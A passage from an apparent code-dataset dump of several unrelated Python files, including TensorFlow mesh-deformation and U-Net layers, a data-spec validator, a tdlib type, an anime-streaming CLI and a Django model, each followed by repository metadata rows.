dx = dot(self.ffd_matrix, x, sparse=True)
return dx
def compute_output_shape(self, input_shape):
output_shape = tf.identity(input_shape)
output_shape[1] = self.ffd_matrix.get_shape().as_list()[0]
return output_shape
class RBFD(layers.Layer):
def __init__(self,rbf_matrix, **kwargs):
self.rbf_matrix = rbf_matrix
super(RBFD, self).__init__(**kwargs)
def get_config(self):
config = {'rbf_matrix': self.rbf_matrix}
base_config = super(RBFD, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def build(self, input_shape):
assert isinstance(input_shape, list)
self.batch_size = input_shape[0][0]
super(RBFD, self).build(input_shape) # Be sure to call this at the end
def call(self, x):
d_grid_coords, mesh_coords= x
d_mesh = tf.matmul(tf.expand_dims(tf.constant(self.rbf_matrix, dtype=tf.float32), axis=0), d_grid_coords)
deformed = mesh_coords + d_mesh
return deformed
def compute_output_shape(self, input_shape):
return input_shape[-1]
class Tile(layers.Layer):
def __init__(self, repeats,**kwargs):
super(Tile, self).__init__(**kwargs)
self.repeats = repeats
def get_config(self):
config = {'repeats': self.repeats}
base_config = super(Tile, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def call(self, x):
x = tf.tile(x, self.repeats)
return x
class Gather(layers.Layer):
def __init__(self, gather_index, **kwargs):
super(Gather, self).__init__(**kwargs)
self.gather_index = gather_index
def get_config(self):
config = {'gather_index': self.gather_index}
base_config = super(Gather, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def build(self, input_shape):
super(Gather, self).build(input_shape) # Be sure to call this at the end
def call(self, x):
sample = tf.gather(x, tf.constant(self.gather_index, dtype=tf.int32), axis=1)
return sample
class Translate(layers.Layer):
def __init__(self, **kwargs):
super(Translate, self).__init__(**kwargs)
def get_config(self):
base_config = super(Translate, self).get_config()
return dict(list(base_config.items()))
def call(self, x):
trans, coords = x
batch_size = coords.get_shape().as_list()[0]
trans = tf.reshape(trans, [batch_size, 1, 3])
coords += trans
center = tf.reduce_mean(coords, axis=1, keepdims=True)
#center = tf.Print(center, [trans, center], message="trans, center")
return [center, coords]
def build(self, input_shape):
super(Translate, self).build(input_shape) # Be sure to call this at the end
def compute_output_shape(self, input_shape):
return input_shape
class ExpandDim(layers.Layer):
def __init__(self, axis=0,**kwargs):
super(ExpandDim, self).__init__(**kwargs)
self.axis = axis
def get_config(self):
config = {'axis': self.axis}
base_config = super(ExpandDim, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def call(self, x):
x = tf.expand_dims(x, axis=self.axis)
return x
def compute_output_shape(self, input_shape):
if self.axis==-1:
input_shape = list(input_shape).append(1)
else:
input_shape = list(input_shape).insert(self.axis, 1)
return input_shape
class Split(layers.Layer):
def __init__(self, axis=-1, num=1,**kwargs):
super(Split, self).__init__(**kwargs)
self.axis = axis
self.num = num
def get_config(self):
config = {'axis': self.axis, 'num': self.num}
base_config = super(Split, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def build(self, input_shape):
super(Split, self).build(input_shape) # Be sure to call this at the end
def call(self, x):
x = tf.split(x, self.num, axis=self.axis)
return x
def compute_output_shape(self, input_shape):
shape_list = []
input_shape[self.axis] = input_shape[self.axis] // self.num
for i in range(self.num):
shape_list.append(input_shape)
return shape_list
class ImageWarped(layers.Layer):
def __init__(self, size=[128,128,128], **kwargs):
super(ImageWarped, self).__init__(**kwargs)
self.size = size
def get_config(self):
config = {'size': self.size}
base_config = super(ImageWarped, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def build(self, input_shape):
# Create a trainable weight variable for this layer.
# input shapes: 4 by 4 transform matrix, feature 1, 2, 3, 4, mesh_coords
assert isinstance(input_shape, list)
self.batch_size = input_shape[-1][0]
super(ImageWarped, self).build(input_shape) # Be sure to call this at the end
def call(self, inputs):
image_inputs, image_grid = inputs
factor = tf.constant([[[self.size[0], self.size[1], self.size[2]]]], dtype=tf.float32)
# TODO: change to zero diff when oob
#indices = tf.Print(indices, [tf.reduce_min(indices, axis=1), tf.reduce_max(indices, axis=1)], message="Before: ")
indices = image_grid * factor
indices = tf.clip_by_value(indices, clip_value_min=0.001, clip_value_max=tf.reduce_min(factor)-1.001)
#indices = tf.Print(indices, [tf.reduce_min(indices, axis=1), tf.reduce_max(indices, axis=1)], message="After: ")
x1 = tf.floor(indices[:,:,0])
x2 = tf.ceil(indices[:,:,0])
y1 = tf.floor(indices[:,:,1])
y2 = tf.ceil(indices[:,:,1])
z1 = tf.floor(indices[:,:,2])
z2 = tf.ceil(indices[:,:,2])
q11 = gather_nd(image_inputs, tf.cast(tf.stack([x1, y1, z1], axis=-1), tf.int32))
#q11 = tf.Print(q11, [indices, q11])
q21 = gather_nd(image_inputs, tf.cast(tf.stack([x2, y1, z1], axis=-1), tf.int32))
q12 = gather_nd(image_inputs, tf.cast(tf.stack([x1, y2, z1], axis=-1), tf.int32))
q22 = gather_nd(image_inputs, tf.cast(tf.stack([x2, y2, z1], axis=-1), tf.int32))
wx = tf.expand_dims(tf.subtract(indices[:,:,0], x1), -1)
wx2 = tf.expand_dims(tf.subtract(x2, indices[:,:,0]), -1)
lerp_x1 = tf.add(tf.multiply(q21, wx), tf.multiply(q11, wx2))
lerp_x2 = tf.add(tf.multiply(q22, wx), tf.multiply(q12, wx2))
wy = tf.expand_dims(tf.subtract(indices[:,:,1], y1), -1)
wy2 = tf.expand_dims(tf.subtract(y2, indices[:,:,1]), -1)
lerp_y1 = tf.add(tf.multiply(lerp_x2, wy), tf.multiply(lerp_x1, wy2))
q11 = gather_nd(image_inputs, tf.cast(tf.stack([x1, y1, z2], axis=-1), tf.int32))
q21 = gather_nd(image_inputs, tf.cast(tf.stack([x2, y1, z2], axis=-1), tf.int32))
q12 = gather_nd(image_inputs, tf.cast(tf.stack([x1, y2, z2], axis=-1), tf.int32))
q22 = gather_nd(image_inputs, tf.cast(tf.stack([x2, y2, z2], axis=-1), tf.int32))
lerp_x1 = tf.add(tf.multiply(q21, wx), tf.multiply(q11, wx2))
lerp_x2 = tf.add(tf.multiply(q22, wx), tf.multiply(q12, wx2))
lerp_y2 = tf.add(tf.multiply(lerp_x2, wy), tf.multiply(lerp_x1, wy2))
wz = tf.expand_dims(tf.subtract(indices[:,:,2], z1), -1)
wz2 = tf.expand_dims(tf.subtract(z2, indices[:,:,2]),-1)
deformed = tf.add(tf.multiply(lerp_y2, wz), tf.multiply(lerp_y1, wz2))
return deformed
def compute_output_shape(self, input_shape):
output_shape = tf.identity(input_shape[-1])
output_shape[-1] = 1
return output_shape
class SplitMeshByIDs(layers.Layer):
def __init__(self,id_list,**kwargs):
super(SplitMeshByIDs, self).__init__(**kwargs)
self.id_list = id_list
def get_config(self):
config = {'id_list': self.id_list}
base_config = super(SplitMeshByIDs, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def build(self, input_shape):
super(SplitMeshByIDs, self).build(input_shape) # Be sure to call this at the end
def call(self, x):
out_list = []
for i in range(len(self.id_list)-1):
x_i = x[:, self.id_list[i]:self.id_list[i+1], :]
out_list.append(x_i)
return out_list
def compute_output_shape(self, input_shape):
shape_list = []
for i in range(len(self.id_list)-1):
mesh_shape = tf.identity(input_shape)
mesh_shape[1] = self.id_list[i+1]-self.id_list[i]
shape_list.append(mesh_shape)
return shape_list
class ScalarMul(layers.Layer):
def __init__(self, factor=1.,**kwargs):
super(ScalarMul, self).__init__(**kwargs)
self.factor = factor
def get_config(self):
config = {'factor': self.factor}
base_config = super(ScalarMul, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def call(self, x):
x *= self.factor
return x
def gather_nd(features, indices):
# tf1.12 does not support gather_nd with batch_dims; work around:
ind_shape = tf.shape(indices)
indices = tf.reshape(indices, [ind_shape[0]*ind_shape[1], ind_shape[2]])
first = tf.cast(tf.range(tf.size(indices[:,0]))/ind_shape[1], dtype=tf.int32)
indices = tf.concat([tf.expand_dims(first, axis=-1), indices], axis=1)
gather = tf.reshape(tf.gather_nd(features, indices), [ind_shape[0],ind_shape[1],tf.shape(features)[-1]])
return gather
class Projection(layers.Layer):
def __init__(self, feature_block_ids=[1], size=128, **kwargs):
super(Projection, self).__init__(**kwargs)
self.feature_block_ids = feature_block_ids
self.size = size
def get_config(self):
config = {'feature_block_ids': self.feature_block_ids, 'size': self.size}
base_config = super(Projection, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def build(self, input_shape):
# Create a trainable weight variable for this layer.
# input shapes: 4 by 4 transform matrix, feature 1, 2, 3, 4, mesh_coords
assert isinstance(input_shape, list)
self.batch_size = input_shape[-1][0]
super(Projection, self).build(input_shape) # Be sure to call this at the end
def call(self, inputs):
features0,features1,features2,features3,features4, mesh_coords= inputs
mesh_shape = mesh_coords.get_shape().as_list()
mesh_coords = tf.reshape(mesh_coords, [mesh_shape[0], mesh_shape[1]*(mesh_shape[2]//3), 3])
out = tf.zeros([mesh_shape[0], mesh_shape[1]*(mesh_shape[2]//3), 0], tf.float32)
features = [features0, features1, features2, features3, features4]
num = len(features)
id_list = self.feature_block_ids
features = [features[i] for i in self.feature_block_ids]
for i, power in enumerate(id_list):
factor = tf.constant([[[(0.5**power)*self.size[0], (0.5**power)*self.size[1], (0.5**power)*self.size[2]]]], dtype=tf.float32)
factor = tf.tile(factor, [tf.shape(mesh_coords)[0], 1,1])
indices = mesh_coords * factor
#indices = tf.cast(indices[:,:,:-1], tf.int32)
#indices = tf.Print(indices, [self.feature_block_ids, indices, mesh_coords], message='Level: %d' % i)
indices = tf.clip_by_value(indices, 0.01,tf.cast(tf.reduce_min(tf.shape(features[i])[1:4]), tf.float32)-1.01)
x1 = tf.floor(indices[:,:,0])
x2 = tf.ceil(indices[:,:,0])
y1 = tf.floor(indices[:,:,1])
y2 = tf.ceil(indices[:,:,1])
z1 = tf.floor(indices[:,:,2])
z2 = tf.ceil(indices[:,:,2])
q11 = gather_nd(features[i], tf.cast(tf.stack([x1, y1, z1], axis=-1), tf.int32))
#q11 = tf.Print(q11, [indices, q11])
q21 = gather_nd(features[i], tf.cast(tf.stack([x2, y1, z1], axis=-1), tf.int32))
q12 = gather_nd(features[i], tf.cast(tf.stack([x1, y2, z1], axis=-1), tf.int32))
q22 = gather_nd(features[i], tf.cast(tf.stack([x2, y2, z1], axis=-1), tf.int32))
wx = tf.expand_dims(tf.subtract(indices[:,:,0], x1), -1)
wx2 = tf.expand_dims(tf.subtract(x2, indices[:,:,0]), -1)
lerp_x1 = tf.add(tf.multiply(q21, wx), tf.multiply(q11, wx2))
lerp_x2 = tf.add(tf.multiply(q22, wx), tf.multiply(q12, wx2))
wy = tf.expand_dims(tf.subtract(indices[:,:,1], y1), -1)
wy2 = tf.expand_dims(tf.subtract(y2, indices[:,:,1]), -1)
lerp_y1 = tf.add(tf.multiply(lerp_x2, wy), tf.multiply(lerp_x1, wy2))
q11 = gather_nd(features[i], tf.cast(tf.stack([x1, y1, z2], axis=-1), tf.int32))
q21 = gather_nd(features[i], tf.cast(tf.stack([x2, y1, z2], axis=-1), tf.int32))
q12 = gather_nd(features[i], tf.cast(tf.stack([x1, y2, z2], axis=-1), tf.int32))
q22 = gather_nd(features[i], tf.cast(tf.stack([x2, y2, z2], axis=-1), tf.int32))
lerp_x1 = tf.add(tf.multiply(q21, wx), tf.multiply(q11, wx2))
lerp_x2 = tf.add(tf.multiply(q22, wx), tf.multiply(q12, wx2))
lerp_y2 = tf.add(tf.multiply(lerp_x2, wy), tf.multiply(lerp_x1, wy2))
wz = tf.expand_dims(tf.subtract(indices[:,:,2], z1), -1)
wz2 = tf.expand_dims(tf.subtract(z2, indices[:,:,2]),-1)
lerp_z = tf.add(tf.multiply(lerp_y2, wz), tf.multiply(lerp_y1, wz2))
out = tf.concat([out, lerp_z], axis=-1)
#out -= tf.reduce_mean(out, [1,2], keepdims=True)
out = tf.reshape(out, [mesh_shape[0], mesh_shape[1], out.get_shape().as_list()[-1]*(mesh_shape[2]//3)])
return out
class GraphConv(layers.Layer):
def __init__(self, input_dim=10, output_dim=10, adjs=None, dropout=False,
sparse_inputs=False, act=tf.nn.relu, bias=True,
featureless=False, **kwargs):
super(GraphConv, self).__init__(**kwargs)
self.input_dim = input_dim
self.output_dim = output_dim
self.bias = bias
self.dropout = dropout
self.sparse_inputs = sparse_inputs
self.act = act
self.featureless = featureless
self.vars = {}
self.adjs = adjs
def get_config(self):
config = {'input_dim': self.input_dim,
'output_dim': self.output_dim,
'adjs': self.adjs,
'dropout':self.dropout,
'sparse_inputs': self.sparse_inputs,
'act': self.act,
'bias':self.bias,
'featureless': self.featureless}
base_config = super(GraphConv, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def build(self, input_shape):
# Create a trainable weight variable for this layer.
self.batch_size = input_shape[0]
num_cheb_support = len(self.adjs)
for i in range(1, num_cheb_support+1):
name = 'kernel_'+str(i)
self.vars[name] = self.add_weight(name=name,
shape=(self.input_dim, self.output_dim),
initializer='glorot_normal',
regularizer=regularizers.l2(0.01),
trainable=True)
self.vars['bias'] = self.add_weight(name='bias',
shape=( self.output_dim),
initializer='zeros',
#regularizer=regularizers.l2(0.01),
trainable=True)
super(GraphConv, self).build(input_shape) # Be sure to call this at the end
def call(self, x):
support_1 = dot(x, self.vars['kernel_1'], sparse=self.sparse_inputs)
output = dot(self.adjs[0], support_1, sparse=True)
for i in range(2, len(self.adjs)+1):
name = 'kernel_'+str(i)
support = dot(x, self.vars[name], sparse=self.sparse_inputs)
output = output + dot(self.adjs[i-1], support, sparse=True)
if self.bias:
output += self.vars['bias']
return self.act(output)
def compute_output_shape(self, input_shape):
output_shape = tf.identity(input_shape)
output_shape[-1] = self.output_dim
return output_shape
from tensorflow.python.keras.layers import Layer, InputSpec
from tensorflow.python.keras import initializers, regularizers, constraints
class InstanceNormalization(layers.Layer):
"""Instance normalization layer. Taken from keras.contrib
Normalize the activations of the previous layer at each step,
i.e. applies a transformation that maintains the mean activation
close to 0 and the activation standard deviation close to 1.
# Arguments
axis: Integer, the axis that should be normalized
(typically the features axis).
For instance, after a `Conv2D` layer with
`data_format="channels_first"`,
set `axis=1` in `InstanceNormalization`.
Setting `axis=None` will normalize all values in each
instance of the batch.
Axis 0 is the batch dimension. `axis` cannot be set to 0 to avoid errors.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor.
If False, `beta` is ignored.
scale: If True, multiply by `gamma`.
If False, `gamma` is not used.
When the next layer is linear (also e.g. `nn.relu`),
this can be disabled since the scaling
will be done by the next layer.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
# Input shape
Arbitrary. Use the keyword argument `input_shape`
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a Sequential model.
# Output shape
Same shape as input.
# References
- [Layer Normalization](https://arxiv.org/abs/1607.06450)
- [Instance Normalization: The Missing Ingredient for Fast Stylization](
https://arxiv.org/abs/1607.08022)
"""
def __init__(self,
axis=None,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
**kwargs):
super(InstanceNormalization, self).__init__(**kwargs)
self.supports_masking = True
self.axis = axis
self.epsilon = epsilon
self.center = center
self.scale = scale
self.beta_initializer = initializers.get(beta_initializer)
self.gamma_initializer = initializers.get(gamma_initializer)
self.beta_regularizer = regularizers.get(beta_regularizer)
self.gamma_regularizer = regularizers.get(gamma_regularizer)
self.beta_constraint = constraints.get(beta_constraint)
self.gamma_constraint = constraints.get(gamma_constraint)
def build(self, input_shape):
ndim = len(input_shape)
if self.axis == 0:
raise ValueError('Axis cannot be zero')
if (self.axis is not None) and (ndim == 2):
raise ValueError('Cannot specify axis for rank 1 tensor')
self.input_spec = InputSpec(ndim=ndim)
if self.axis is None:
shape = (1,)
else:
shape = (input_shape[self.axis],)
if self.scale:
self.gamma = self.add_weight(shape=shape,
name='gamma',
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint)
else:
self.gamma = None
if self.center:
self.beta = self.add_weight(shape=shape,
name='beta',
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint)
else:
self.beta = None
self.built = True
def call(self, inputs, training=None):
input_shape = K.int_shape(inputs)
reduction_axes = list(range(0, len(input_shape)))
if self.axis is not None:
del reduction_axes[self.axis]
del reduction_axes[0]
mean = K.mean(inputs, reduction_axes, keepdims=True)
stddev = K.std(inputs, reduction_axes, keepdims=True) + self.epsilon
normed = (inputs - mean) / stddev
broadcast_shape = [1] * len(input_shape)
if self.axis is not None:
broadcast_shape[self.axis] = input_shape[self.axis]
if self.scale:
broadcast_gamma = K.reshape(self.gamma, broadcast_shape)
normed = normed * broadcast_gamma
if self.center:
broadcast_beta = K.reshape(self.beta, broadcast_shape)
normed = normed + broadcast_beta
return normed
def get_config(self):
config = {
'axis': self.axis,
'epsilon': self.epsilon,
'center': self.center,
'scale': self.scale,
'beta_initializer': initializers.serialize(self.beta_initializer),
'gamma_initializer': initializers.serialize(self.gamma_initializer),
'beta_regularizer': regularizers.serialize(self.beta_regularizer),
'gamma_regularizer': regularizers.serialize(self.gamma_regularizer),
'beta_constraint': constraints.serialize(self.beta_constraint),
'gamma_constraint': constraints.serialize(self.gamma_constraint)
}
base_config = super(InstanceNormalization, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ConvBlock(layers.Layer):
def __init__(self, num_filters):
super(ConvBlock, self).__init__()
self.conv_3d = layers.Conv3D(num_filters, (3, 3, 3), padding='same')
self.conv_3d_2 = layers.Conv3D(num_filters, (3, 3, 3), padding='same')
self.batch_norm = layers.BatchNormalization()
self.batch_norm_2 = layers.BatchNormalization()
self.activation = layers.Activation('relu')
def call(self, inputs):
encoder = self.conv_3d(inputs)
encoder = self.batch_norm(encoder)
encoder = self.activation(encoder)
encoder = self.conv_3d_2(encoder)
encoder = self.batch_norm_2(encoder)
return self.activation(encoder)
class EncoderBlock(layers.Layer):
def __init__(self, num_filters):
super(EncoderBlock, self).__init__()
self.conv_block = ConvBlock(num_filters)
self.pool = layers.MaxPooling3D((2, 2, 2), strides=(2,2,2))
def call(self, inputs):
encoder = self.conv_block(inputs)
return [self.pool(encoder), encoder]
class DecoderBlock(layers.Layer):
def __init__(self, num_filters):
super(DecoderBlock, self).__init__()
self.convT = layers.Conv3DTranspose(num_filters, (2, 2, 2), strides=(2, 2, 2), padding='same')
self.conv2 = layers.Conv3D(int(num_filters/2), (3, 3, 3), padding='same')
self.conv1 = layers.Conv3D(int(num_filters/2), (3, 3, 3), padding='same')
self.concate = layers.Concatenate(axis=-1)
self.batch_norm = layers.BatchNormalization()
self.batch_norm_2 = layers.BatchNormalization()
self.batch_norm_3 = layers.BatchNormalization()
self.activation = layers.Activation('relu')
def call(self, inputs):
features, encoder_out = inputs
decoder_out = self.convT(encoder_out)
decoder_out = self.concate([decoder_out, features])
decoder_out = self.activation(self.batch_norm(decoder_out))
decoder_out = self.activation(self.batch_norm_2(self.conv2(decoder_out)))
decoder_out = self.activation(self.batch_norm_3(self.conv1(decoder_out)))
return decoder_out
class UnetEncoder(layers.Layer):
def __init__(self):
super(UnetEncoder, self).__init__()
self.block1 = EncoderBlock(32)
self.block2 = EncoderBlock(64)
self.block3 = EncoderBlock(128)
self.center = ConvBlock(256)
def call(self, inputs):
encoder0_pool, encoder0= self.block1(inputs)
encoder1_pool, encoder1 = self.block2(encoder0_pool)
encoder2_pool, encoder2 = self.block3(encoder1_pool)
center = self.center(encoder2_pool)
return [encoder0, encoder1, encoder2, center]
class UNetDecoder(layers.Layer):
def __init__(self, num_class):
super(UNetDecoder, self).__init__()
self.block1 = DecoderBlock(512)
self.block2 = DecoderBlock(256)
self.block3 = DecoderBlock(128)
self.conv = layers.Conv3D(num_class, (1,1,1), activation='softmax', data_format="channels_last")
def call(self, inputs):
encoder0, encoder1, encoder2, center = inputs
decoder0 = self.block1([encoder2, center])
decoder1 = self.block2([encoder1, decoder0])
decoder2 = self.block3([encoder0, decoder1])
output = self.conv(decoder2)
return output
| 45.579353 | 137 | 0.61837 | 27,485 | 0.929144 | 0 | 0 | 0 | 0 | 0 | 0 | 4,693 | 0.158649 |
33e320a31c348ff9ae4c6582aaca0b0e10833e86 | 2,455 | py | Python | data_spec_validator/spec/actions.py | travisliu/data-spec-validator | 7ee0944ca9899d565ad04ed82ca26bb402970958 | [
"MIT"
] | 23 | 2021-08-11T08:53:15.000Z | 2022-02-14T04:44:13.000Z | data_spec_validator/spec/actions.py | travisliu/data-spec-validator | 7ee0944ca9899d565ad04ed82ca26bb402970958 | [
"MIT"
] | 2 | 2021-09-11T08:59:12.000Z | 2022-03-29T00:40:42.000Z | data_spec_validator/spec/actions.py | travisliu/data-spec-validator | 7ee0944ca9899d565ad04ed82ca26bb402970958 | [
"MIT"
] | 1 | 2022-01-04T07:45:22.000Z | 2022-01-04T07:45:22.000Z | from .defines import MsgLv, UnknownFieldValue, ValidateResult, get_msg_level
from .validators import SpecValidator
def _wrap_error_with_field_info(failure):
if get_msg_level() == MsgLv.VAGUE:
return RuntimeError(f'field: {failure.field} not well-formatted')
if isinstance(failure.value, UnknownFieldValue):
return LookupError(f'field: {failure.field} missing')
msg = f'field: {failure.field}, reason: {failure.error}'
return type(failure.error)(msg)
def _flatten_results(failures, errors=None):
if type(errors) != list:
raise RuntimeError(f'{errors} not a list')
if type(failures) == tuple:
_flatten_results(failures[1], errors)
elif type(failures) == list:
for item in failures:
_flatten_results(item, errors)
elif isinstance(failures, ValidateResult):
if issubclass(type(failures.error), Exception):
error = _wrap_error_with_field_info(failures)
errors.append(error)
return
_flatten_results(failures.error, errors)
def _find_most_significant_error(failures):
errors = []
_flatten_results(failures, errors)
# Build error list by error types
err_map = {}
for err in errors:
if isinstance(err, ValueError):
err_key = 'ValueError'
elif isinstance(err, PermissionError):
err_key = 'PermissionError'
elif isinstance(err, TypeError):
err_key = 'TypeError'
elif isinstance(err, LookupError):
err_key = 'LookupError'
else:
err_key = 'RuntimeError'
err_map.setdefault(err_key, []).append(err)
# Severity, PermissionError > LookupError > TypeError > ValueError > RuntimeError.
errors = (
err_map.get('PermissionError', [])
or err_map.get('LookupError', [])
or err_map.get('TypeError', [])
or err_map.get('ValueError', [])
or err_map.get('RuntimeError', [])
)
# TODO: For better information, we can raise an error with all error messages at one shot
main_error = errors[0]
return main_error
def validate_data_spec(data, spec, **kwargs):
# SPEC validator as the root validator
ok, failures = SpecValidator.validate(data, {SpecValidator.name: spec}, None)
nothrow = kwargs.get('nothrow', False)
if not ok and not nothrow:
error = _find_most_significant_error(failures)
raise error
return ok
| 34.097222 | 93 | 0.657434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 534 | 0.217515 |
33e48de23ace5856239e5367cf22a81d72e55b3b | 290 | py | Python | hwtypes/compatibility.py | splhack/hwtypes | aee03c086226fa3ed5892c998603cb8477e15f5e | [
"BSD-3-Clause"
] | 167 | 2017-10-08T00:59:22.000Z | 2022-02-08T00:14:39.000Z | hwtypes/compatibility.py | splhack/hwtypes | aee03c086226fa3ed5892c998603cb8477e15f5e | [
"BSD-3-Clause"
] | 719 | 2017-08-29T17:58:28.000Z | 2022-03-31T23:39:18.000Z | hwtypes/compatibility.py | splhack/hwtypes | aee03c086226fa3ed5892c998603cb8477e15f5e | [
"BSD-3-Clause"
] | 14 | 2017-09-01T03:25:16.000Z | 2021-11-05T13:30:24.000Z | import sys
__all__ = ['IntegerTypes', 'StringTypes']
if sys.version_info < (3,):
IntegerTypes = (int, long)
StringTypes = (str, unicode)
long = long
import __builtin__ as builtins
else:
IntegerTypes = (int,)
StringTypes = (str,)
long = int
import builtins
| 19.333333 | 41 | 0.641379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 27 | 0.093103 |
33e56033d7e024573e61a6a3dc78c7548534c357 | 285 | py | Python | py_tdlib/constructors/secret_chat.py | Mr-TelegramBot/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 24 | 2018-10-05T13:04:30.000Z | 2020-05-12T08:45:34.000Z | py_tdlib/constructors/secret_chat.py | MrMahdi313/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 3 | 2019-06-26T07:20:20.000Z | 2021-05-24T13:06:56.000Z | py_tdlib/constructors/secret_chat.py | MrMahdi313/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 5 | 2018-10-05T14:29:28.000Z | 2020-08-11T15:04:10.000Z | from ..factory import Type
class secretChat(Type):
id = None # type: "int32"
user_id = None # type: "int32"
state = None # type: "SecretChatState"
is_outbound = None # type: "Bool"
ttl = None # type: "int32"
key_hash = None # type: "bytes"
layer = None # type: "int32"
| 23.75 | 40 | 0.635088 | 255 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 114 | 0.4 |
33e70135430c756b9a90a2e67be6abde70c17fb4 | 100 | py | Python | paraVerComoFuncionaAlgumasCoisas/sqlite3/fazendoTeste/teste.py | jonasht/pythonEstudos | 5e7d28e7bd82b9d1b08e795867fdbaa743f4b747 | [
"MIT"
] | null | null | null | paraVerComoFuncionaAlgumasCoisas/sqlite3/fazendoTeste/teste.py | jonasht/pythonEstudos | 5e7d28e7bd82b9d1b08e795867fdbaa743f4b747 | [
"MIT"
] | null | null | null | paraVerComoFuncionaAlgumasCoisas/sqlite3/fazendoTeste/teste.py | jonasht/pythonEstudos | 5e7d28e7bd82b9d1b08e795867fdbaa743f4b747 | [
"MIT"
] | null | null | null | import PegandoVariavel as v
print(v.get_Pessoas())
print()
for d in v.get_Pessoas():
print(d) | 12.5 | 27 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33e78a01265ca1d4db3cea8c8ee8b0a653ab15e6 | 2,689 | py | Python | main.py | Abrolhus/animeDlCLI | 4ba7fc4c24eb0b01a6352a1f6b011edee79b8ea3 | [
"MIT"
] | null | null | null | main.py | Abrolhus/animeDlCLI | 4ba7fc4c24eb0b01a6352a1f6b011edee79b8ea3 | [
"MIT"
] | null | null | null | main.py | Abrolhus/animeDlCLI | 4ba7fc4c24eb0b01a6352a1f6b011edee79b8ea3 | [
"MIT"
] | null | null | null | import click
from Crypto.Cipher import AES
import base64
from hashlib import md5
import warnings
import requests_cache
import requests
import logging
import subprocess
import tempfile
from anime_downloader.sites import get_anime_class
import util
@click.command()
@click.argument('name')
@click.option('-e', '--ep', default=1, help='episode')
@click.option('--provider', default='twist.moe', help='site to get animes from')
@click.option('--autoplay', is_flag=True, help='Autoplays next episode')
def hello(name, ep, provider, autoplay):
Anime = get_anime_class(provider)
player = 'mpv'
searchResults = Anime.search(name)
# click.echo(searchResults)
anime = Anime(searchResults[0].url)
print(anime)
episode = anime[ep-1]
episode2 = anime[ep]
click.echo(episode.source().stream_url)
#click.echo(episode2.source().stream_url)
click.echo(episode.source().referer)
# util.play_episode(episode, player=player, title=f'{anime.title} - Episode {episode.ep_no}')
# title=f'{anime.title} - Episode {episode.ep_no}'
# title2=f'{anime.title} - Episode {episode2.ep_no}'
# p = subprocess.Popen([
# player,
# '--title={}'.format(title),
# '--referrer="{}"'.format(episode.source().referer),
# episode.source().stream_url,
# '--title={}'.format(title2),
# '--referrer="{}"'.format(episode2.source().referer),
# episode2.source().stream_url
# ])
tfile = tempfile.NamedTemporaryFile(mode='a+', suffix='.m3u8')
mpvArgs = [player, '--referrer={}'.format('https://twist.moe/'), '--playlist']
if player == 'mpv':
util.makePlaylist(anime[0:1], tfile)
# for epi in anime:
# title = f'{anime.title} - Episode {epi.ep_no}'
# mpvArgs += ['--title={}'.format(title),
# 'ffmpeg://{}'.format(epi.source().stream_url)]
# click.echo("uai")
print(tfile.name)
mpvArgs.append(tfile.name)
print(mpvArgs)
tfile.seek(0)
print(tfile.read())
#mpvArgs.append('{0} >/dev/null 2>&1 &')
#subprocess.Popen("nohup usr/local/bin/otherscript.pl {0} >/dev/null 2>&1 &", shell=True)
print(''.join(mpvArgs))
util.addAnimesToPlaylist(anime[1:], tfile)
p = subprocess.Popen(mpvArgs, stdin=None, stdout=None, stderr=None)
print("humm")
print(anime[0:1])
print(anime[1:])
print("uaaaaaaaaaaaaaaaaaaaaaaaa");
tfile.seek(0)
print(tfile.read())
p.wait()
else:
p = subprocess.Popen([player, episode.source().stream_url])
p.wait()
if __name__ == "__main__":
hello()
| 34.474359 | 97 | 0.613611 | 0 | 0 | 0 | 0 | 2,398 | 0.891781 | 0 | 0 | 1,052 | 0.391224 |
33e792cf546e5c419d580edda8137736596261a6 | 333 | py | Python | file_upload/address/models.py | pkscredy/lat_long | 1079d4c4eaf16a7df08c431aaa83eed188099af4 | [
"MIT"
] | null | null | null | file_upload/address/models.py | pkscredy/lat_long | 1079d4c4eaf16a7df08c431aaa83eed188099af4 | [
"MIT"
] | null | null | null | file_upload/address/models.py | pkscredy/lat_long | 1079d4c4eaf16a7df08c431aaa83eed188099af4 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
from django.db import models
class Document(models.Model):
file_name = models.CharField(max_length=255, blank=True)
document = models.FileField(upload_to='documents/')
uploaded_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.description
| 25.615385 | 60 | 0.756757 | 260 | 0.780781 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | 0.036036 |
